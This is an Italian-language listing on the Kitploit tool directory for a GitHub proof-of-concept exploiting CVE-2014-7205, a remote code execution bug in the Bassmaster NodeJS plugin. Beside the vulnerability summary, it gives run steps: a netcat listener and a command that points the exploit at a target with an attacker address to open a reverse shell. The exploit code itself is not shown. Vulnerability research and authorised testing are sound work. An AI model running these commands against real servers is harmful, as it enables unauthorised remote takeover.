Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2014-7205 — Bassmaster Plugin NodeJS RCE | Kitploit
Strumenti/GitHubGitHub/andrewtrube/cve-2014-7205
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingGenerazione di Shellcode
GitHubandrewtrube/cve-2014-7205

CVE-2014-7205

Bassmaster Plugin NodeJS RCE

Vedi Repository
4 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Bassmaster NodeJS Plugin RCE PoC

bassmaster-rce.py: Uno script Python per sfruttare CVE-2014-7205. nodeshell.py: Un modulo Python per generare una reverse shell per NodeJS

!!Utilizzare solo contro server su cui si ha il permesso di testare

Riepilogo

CVE-2014-7205 è una vulnerabilità di Remote Code Execution nel plugin Bassmaster per NodeJS. Tutte le versioni <= 1.5.1 sono affette. La vulnerabilità esiste nel file lib/batch.js nella funzione internals.batch dove una chiamata a eval() utilizza input utente non correttamente escaped (in pratica la regex non verifica se le richieste contengono codice malevolo).

Prova di Concetto

  1. Scaricare o clonare il repository git
  2. Aprire un listener netcat nel terminale bash nc -lvp 4444
  3. Assicurarsi che bassmaster-rce.py e nodeshell.py siano nella stessa cartella
  4. Eseguire bassmaster-rce.py python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444

Altro

  • nodeshell.py è completamente portabile ad altri PoC ed Exploit che utilizzano python e che necessitano anche di generare una reverse shell per NodeJS
Scarica lo strumento